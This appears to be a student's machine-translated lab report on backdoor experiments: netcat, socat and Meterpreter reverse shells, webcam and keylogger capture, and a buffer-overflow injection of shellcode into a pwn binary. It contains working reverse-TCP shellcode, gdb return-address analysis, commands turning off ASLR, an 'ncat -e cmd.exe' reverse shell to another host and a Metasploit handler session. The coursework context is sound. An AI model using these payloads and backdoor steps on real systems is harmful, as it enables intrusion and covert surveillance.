Write at the top
The experiment took a total of three days, five experimental section completed. There are two unresolved problems, when one is Windows cmd interface system receives information from Linux by nc, transcoding error occurs, it may be some inherent flaws of Windows, I try to change the coding at both ends, have failed to solve ; Second, failure to achieve shellcode bounce between two virtual machines connected to the fifth part injection, inject shellcode only realized the different terminals of a single host, probably due to set my shellcode in the network part of the problem.
Last said the experiment wants to hurry up, but also dragged on, got to.
This time, mainly because of wasted too much time, to change the Chinese coding and shared folders accidentally almost Linux did not let up, then do the experiments repeatedly because mentally reasons weird stuck.
Content Experiments
Use netcat get the host operating Shell, cron start
Here there have been Chinese garbled, but does not affect the function, I try to process attached to the back door.
Use socat get the host operating Shell, plans to start the task
Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound Shell connection, plus the contents of this experiment together written report.
Experiments and experience summary
Most of the contents of this experiment experiments were performed under ideal circumstances. I completed the course, the following experience:
(1) To guard against unknown source software , the old saying "nothing gallant, non-rape or theft." Download the software should go to the official website to download pirated software download site or software installation package is difficult to ensure security, even if security software is also difficult to ensure computer security.
(2) network attacks have integrated, systematic, simplified , integrated software, "personalized" attacks settings, network attack is no longer a specialty of some discipline professionals, our country has been related to information security laws and regulations, but the individual level, we still need to maintain a high awareness of information security.
(3) In addition to the implanted backdoors, hardware, software backdoor itself allows frightening, production equipment must be independent and reliable information, that is what we have been doing a large project, it makes sense for our national security.
(4) Information security is passive , the trail network attacks are difficult to track, which is similar to the confidentiality of the theory, in order to ensure information security, we must carry out scientific management, technology and systems are indispensable, information to protect the security system of the whole life cycle.
(5) completion of the experiment, if they think they have fully mastered the experimental principle, exactly do the various steps of the experiment, we must have confidence in ourselves , the experiment can be a summary of decomposition, combing the details of the various steps of a re-operation look, if it is not successful, we must pay special attention to system alerts, or to consider other possibilities.
Here annoying chatters * 3
[1] began to experiment with a closed defender firewall, forgot to turn off the heat down there before the fire velvet reminder is set to silent, just click on the icon to see the tinder message, repeated several times after the discovery of backdoor software is repeated killing, really pathos TT, here is my tinder killing record
【1】病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.d, 已处理
操作进程:C:\WINDOWS\system32\cmd.exe
病毒路径:C:\Users\Peter Don\exp2-20174306.exe
病毒名称:Backdoor/Meterpreter.d
病毒ID:E9028FFC12855C68
操作结果:已处理
【3】网络防护,僵尸网络防护,受到192.168.124.113的网络攻击,已阻止
关联进程:D:\NETEXP2\ncat\ncat.exe
命令行:D:\NETEXP2\ncat\ncat.exe -e cmd.exe 192.168.124.113 4306
攻击方式:Backdoor/WinCMD
远程地址:192.168.124.113:4306
本地地址:192.168.124.106:56798
防御结果:已阻止
[2] have an afternoon has not found a position nc file transfer, other students are in the original folder, but the user space in my C drive when I repeated several times, and even attempt to use other methods, such as UDP after the transfer, to remember carefully looked at the records of the above tinder killing "virus path" and finally found a bunch of files passed over in the computer, tears.
PS: I experiment were removed, in part by tinder killed, part of the transmission process is not written .exe I deleted.
[3] can take advantage of a flow chart or graphic method to break down during the experiment, such as the last virtual machine shellcode injection, I put it down to eight parts:
disassembly source file to see if the full (because once I use the experiment It has been a tampering of pwn file, causing not find foo analysis and so on in the process);
after stack initialization function (clone virtual machine, after replacing the file does not set will go wrong);
wrote the shellcode;
sub-terminals run through grep, gdb analysis, to identify getshell address;
open listening;
injection;
test.
After I repeated tests fail, the last time I did a detailed test, a success!
Thinking
(1) include a back door you can think of possible ways to enter your system?
Sophomore time to learn, practice over the gray pigeons program, also a kind of backdoor software that makes use of MS06014 **** vulnerability . I also contacted the follow-hing remote control, photo gray pigeons.
(2) How do you know exemplified by the back door to start up (win and linux) way?
From the start, disguised as a system service starts, the software bundled in normal, cheating security software, and so on.
Sui Suinian No.2: gray pigeons with a camouflage started as a system service, by looking at the system service before I turn off some pop ads always kill is not clean, like magic Chinese official website to download the Adobe Acrobat Reader, that is, PDF reader, adobe the right to use this software in China gave a company in Hangzhou, the official website also join the company's genuine software actually bundled advertising popups, I checked to find the exe position after the service check out deleted after world from clean.
What gives you impressive features (3) Meterpreter there?
"Personalized" back door "customized services" greatly reduce the difficulty of network attacks, but greatly increased the complexity of the backdoor.
(4) How to find yourself back door system has not been installed
The most direct way than security software (but not the safest!), You can also check the port there is no port scan the large, strange connection, or a packet capture analysis.
Practice record
Sui Suinian No.3: I shot a total of 60, there are several times that the last named are "the last time XXX", blog formerly known as garden illustration does not show up, after the insertion cursor is automatically moved back, some big picture also you need small map, too suffocated, probably because too many pictures, just modify the time and occasionally swallow map.
Use netcat get the host operating Shell, cron start
The first to do when forgot to close the Linux firewall and WindowsDefender, after off safely actually did it a third part, I forgot how I still tinder. Middle also tried both sides ping.
Here to try to solve the garbage problem, a problem that began a Linux terminal, if the data transmission is not the end Linux canonical format, it will first be garbled.
I started not to think clearly, the Internet looking for a way to modify some of the Linux side, and some also need to change the file, then did not succeed, after careful consideration, I think the problem is the Windows side, the Internet search of the investigation, does have a saying, I think there are students like me interface garbled, I made the following blog shown modified, but there is no change, I do not know why, and normally I end encoding cmd from the Chinese will certainly be changed to utf change of.
Performing a chcp open cmd cmd current encoding can be obtained as shown:
numbers 936 corresponding to gbk encoding. chcp + coded numeric codes, can be arranged cmd code corresponding coding. For example chcp 65001 (provided utf-8 encoded)
Use socat get the host operating Shell, plans to start the task
This section, so smooth, I thought experiment end soon :)
Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
Generating backdoor
File transfer reactions have found (in fact, has been successful, there may be a tinder killed), but did not find, try ping, no problem
try a UDP, and no response
found tinder killing record
Disappointed to find or not, but why exactly the same interface and success, but also can pass information?
Thinking a little trial and error, I think the record tinder, and found a large family :)
Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
Also very smooth, the effect is quite frightening. The results have shown in the first part.
Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound Shell connection, plus the contents of this experiment together written report.
I started to want to achieve injected between two virtual machines, but failed, always reminding mistakes, from the final results, I may be wrong shellcode, after subtraction of foo might get out of address a mistake, but only to find these errors after I gave up, and finally had time to do the injection between this unit.
Here is part of the attempt to use nc connection, I drew a sketch, but finally did not succeed.
I did not think, I'm stuck in the machine was injected into the two terminals so long, the beginning is wrong on the executable file, and later may not have filled in some settings wrong clone virtual machine may end up in the wrong shellcode set on.
Think about it, may finally do some impatient, there is no detailed analysis of the complete process, but fortunately, the last meal calm to do it again, successful, very frustrating.
First checked the executable
shellcode
end result
good news is made out of it!
The final shellcode
perl -e 'print "A" x 32;print"\x01\x02\x03\x04\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
The last two command interface terminals, occasional errors.
Terminal A:
cyh20174306@kali:~$ cd exp1
cyh20174306@kali:~/exp1$ ls
20174306exp1 exp12 exp20174306 input pwn3
exp11 exp13-20174306 exp2-20174306 input_shellcode tset_from_15
cyh20174306@kali:~/exp1$ objdump -d 20174306exp1 | more
20174306exp1: 文件格式 elf32-i386
Disassembly of section .init:
(此处略去反汇编内容,保留foo、getshell、main)
0804847d <getShell>:
804847d: 55 push %ebp
804847e: 89 e5 mov %esp,%ebp
8048480: 83 ec 18 sub $0x18,%esp
8048483: c7 04 24 60 85 04 08 movl $0x8048560,(%esp)
804848a: e8 c1 fe ff ff call 8048350 <system@plt>
804848f: c9 leave 8048490: c3 ret
08048491 <foo>:
8048491: 55 push %ebp
8048492: 89 e5 mov %esp,%ebp
8048494: 83 ec 38 sub $0x38,%esp
8048497: 8d 45 e4 lea -0x1c(%ebp),%eax
804849a: 89 04 24 mov %eax,(%esp)
804849d: e8 8e fe ff ff call 8048330 <gets@plt>
80484a2: 8d 45 e4 lea -0x1c(%ebp),%eax
80484a5: 89 04 24 mov %eax,(%esp)
80484a8: e8 93 fe ff ff call 8048340 <puts@plt>
80484ad: c9 leave 80484ae: c3 ret
080484af <main>:
80484af: 55 push %ebp
80484b0: 89 e5 mov %esp,%ebp
80484b2: 83 e4 f0 and $0xfffffff0,%esp
80484b5: e8 d7 ff ff ff call 8048491 <foo>
80484ba: b8 00 00 00 00 mov $0x0,%eax
80484bf: c9 leave 80484c0: c3 ret 80484c1: 66 90 xchg %ax,%ax
80484c3: 66 90 xchg %ax,%ax
80484c5: 66 90 xchg %ax,%ax
80484c7: 66 90 xchg %ax,%ax
80484c9: 66 90 xchg %ax,%ax
80484cb: 66 90 xchg %ax,%ax
80484cd: 66 90 xchg %ax,%ax
80484cf: 90 nop
cyh20174306@kali:~/exp1$ execstack -s 20174306exp1
cyh20174306@kali:~/exp1$ execstack -q 20174306exp1
X 20174306exp1
cyh20174306@kali:~/exp1$ more /proc/sys/kernel/randomize_va_space
0
cyh20174306@kali:~/exp1$ su root
密码:
root@kali:/home/cyh20174306/exp1# echo "0" > /proc/sys/kernel/randomize_va_space
root@kali:/home/cyh20174306/exp1# more /proc/sys/kernel/randomize_va_space
0
root@kali:/home/cyh20174306/exp1# perl -e 'print "A" x 32;print"\x01\x02\x03\x04\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
root@kali:/home/cyh20174306/exp1# xxd input_shellcode
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 0102 0304 31c0 31db 31c9 31d2 66b8 6701 ....1.1.1.1.f.g.
00000030: b302 b101 cd80 89c3 b880 ffff fe83 f0ff ................
00000040: 5066 6811 5c66 6a02 89e1 b210 31c0 66b8 Pfh.\fj.....1.f.
00000050: 6a01 cd80 85c0 7524 31c9 b102 31c0 b03f j.....u$1...1..?
00000060: cd80 4979 f931 c050 682f 2f73 6868 2f62 ..Iy.1.Ph//shh/b
00000070: 696e 89e3 31c9 31d2 b00b cd80 b301 31c0 in..1.1.......1.
00000080: b001 cd80 ....
root@kali:/home/cyh20174306/exp1# (cat input_shellcode;cat) | ./20174306exp1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1�1�1�1�f�g��̀�ø�������Pfh\fj��1�f�j̀��u$1ɱ1��?̀Iy�1�Ph//shh/bin��1�1Ұ
�1��̀
段错误
root@kali:/home/cyh20174306/exp1# (cat input_shellcode;cat) | ./20174306exp1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1�1�1�1�f�g��̀�ø�������Pfh\fj��1�f�j̀��u$1ɱ1��?̀Iy�1�Ph//shh/bin��1�1Ұ
�1��̀
段错误
root@kali:/home/cyh20174306/exp1# ^C
root@kali:/home/cyh20174306/exp1# (cat input_shellcode;cat) | ./20174306exp1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����1�1�1�1�f�g��̀�ø�������Pfh\fj��1�f�j̀��u$1ɱ1��?̀Iy�1�Ph//shh/bin��1�1Ұ
�1��̀
Terminal B:
cyh20174306@kali:~/exp1$ ps -ef | grep 20174306exp1
root 4659 4602 0 19:32 pts/0 00:00:00 ./20174306exp1
cyh2017+ 4663 4655 0 19:32 pts/1 00:00:00 grep 20174306exp1
cyh20174306@kali:~/exp1$ gdb
GNU gdb (Debian 8.2-1) 8.2
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) quit
cyh20174306@kali:~/exp1$ su root
密码:
root@kali:/home/cyh20174306/exp1# gdb
GNU gdb (Debian 8.2-1) 8.2
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) attach 4659
Attaching to process 4659
Reading symbols from /home/cyh20174306/exp1/20174306exp1...(no debugging symbols found)...done.
Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
0xf7fd3079 in __kernel_vsyscall ()
(gdb) disassemble foo
Dump of assembler code for function foo:
0x08048491 <+0>: push %ebp
0x08048492 <+1>: mov %esp,%ebp
0x08048494 <+3>: sub $0x38,%esp
0x08048497 <+6>: lea -0x1c(%ebp),%eax
0x0804849a <+9>: mov %eax,(%esp)
0x0804849d <+12>: call 0x8048330 <gets@plt>
0x080484a2 <+17>: lea -0x1c(%ebp),%eax
0x080484a5 <+20>: mov %eax,(%esp)
0x080484a8 <+23>: call 0x8048340 <puts@plt>
0x080484ad <+28>: leave 0x080484ae <+29>: ret End of assembler dump.
(gdb) break *0x080484ae
Breakpoint 1 at 0x80484ae
(gdb) c
Continuing.
Breakpoint 1, 0x080484ae in foo ()
(gdb) info r esp
esp 0xffffd2dc 0xffffd2dc
(gdb) x/16x 0xffffd2dc
0xffffd2dc: 0x04030201 0xdb31c031 0xd231c931 0x0167b866
0xffffd2ec: 0x01b102b3 0xc38980cd 0xffff80b8 0xfff083fe
0xffffd2fc: 0x11686650 0x026a665c 0x10b2e189 0xb866c031
0xffffd30c: 0x80cd016a 0x2475c085 0x02b1c931 0x3fb0c031
(gdb) quit
A debugging session is active.
Inferior 1 [process 4659] will be detached.
Quit anyway? (y or n) y
Detaching from program: /home/cyh20174306/exp1/20174306exp1, process 4659
[Inferior 1 (process 4659) detached]
root@kali:/home/cyh20174306/exp1# perl -e 'print "A" x 32;print"\xe0\xd2\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
root@kali:/home/cyh20174306/exp1# xxd input_shellcode
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: e0d2 ffff 31c0 31db 31c9 31d2 66b8 6701 ....1.1.1.1.f.g.
00000030: b302 b101 cd80 89c3 b880 ffff fe83 f0ff ................
00000040: 5066 6811 5c66 6a02 89e1 b210 31c0 66b8 Pfh.\fj.....1.f.
00000050: 6a01 cd80 85c0 7524 31c9 b102 31c0 b03f j.....u$1...1..?
00000060: cd80 4979 f931 c050 682f 2f73 6868 2f62 ..Iy.1.Ph//shh/b
00000070: 696e 89e3 31c9 31d2 b00b cd80 b301 31c0 in..1.1.......1.
00000080: b001 cd80 ....
root@kali:/home/cyh20174306/exp1# msfconsole
[-] ***rting the Metasploit Framework console...| [-] * WARNING: No database support: No database YAML file [-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\.""'. II 6. .P : .' / | \ . :
II 'T;. .;P' '.' / | .' II 'T; ;P' . / | \ .'
IIIIII 'YvP'-.|.-'`
I love shells --egypt
=[ metasploit v5.0.2-dev ]
-- --=[ 1852 exploits - 1046 auxiliary - 325 post ]-- --=[ 541 payloads - 44 encoders - 10 nops ]-- --=[ 2 evasion ]-- --=[ ** This is Metasploit 5 development branch ** ]
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
CMD /bin/sh yes The command string to execute
LHOST 127.0.0.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Wildcard Target
msf5 exploit(multi/handler) > exploit
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55074) at 2020-03-22 19:41:38 +0800
ls
20174306exp1
exp11
exp12
exp13-20174306
exp2-20174306
exp20174306
input
input_shellcode
pwn3
tset_from_15
This blog. Thank You!